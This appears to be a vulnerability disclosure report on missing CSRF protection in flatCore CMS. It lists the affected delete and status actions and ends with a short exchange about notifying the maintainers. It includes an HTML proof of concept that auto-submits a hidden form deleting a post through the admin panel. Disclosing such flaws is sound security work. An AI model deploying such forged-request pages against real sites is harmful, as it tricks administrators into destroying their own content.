Cross-Site Request Forgery (CSRF) in flatcore/flatcore-cms
Oct 11th 2021
- Missing CSRF token in delete posts and delete folder in the frontend
- Missing backend CSRF validation in 1) removing and enabling fix status and 2) deleting posts, and 3) delete folder and 4) del_exclude in the indexing page (see Permalinks)
- Delete cache
Proof of Concept
Open in index.html <html> <body> <form action="http://[FLATCORE-IP]/flatCore-CMS/acp/acp.php?tn=posts" method="POST"> <input type="hidden" name="delete_id" value="2" /> </form> <script> document.forms.submit(); </script> </body> </html>
Attackers can trick admin users into deleting posts and changing fix status.
delete cache backend
missing delete post validation backend
missing delete folder frontend
missing delete folder backend
missing delete element frontend
removed fixed backend
set fixed backend
Hi @admin, maintainer says he will take time to post the SECURITY.md, https://github.com/flatCore/flatCore-CMS/issues/70, if possible, could you help me by posting the report links there? Thanks!
@haxatron - feel free to share the report URLs on the Github issue that has been created. You are always welcome to share these reports, as the maintainers that view them will be authorised to view.
If the maintainers prefer not to sign up, we request the
SECURITY.md so that we can send a magic URL, giving them access, to their elected email address.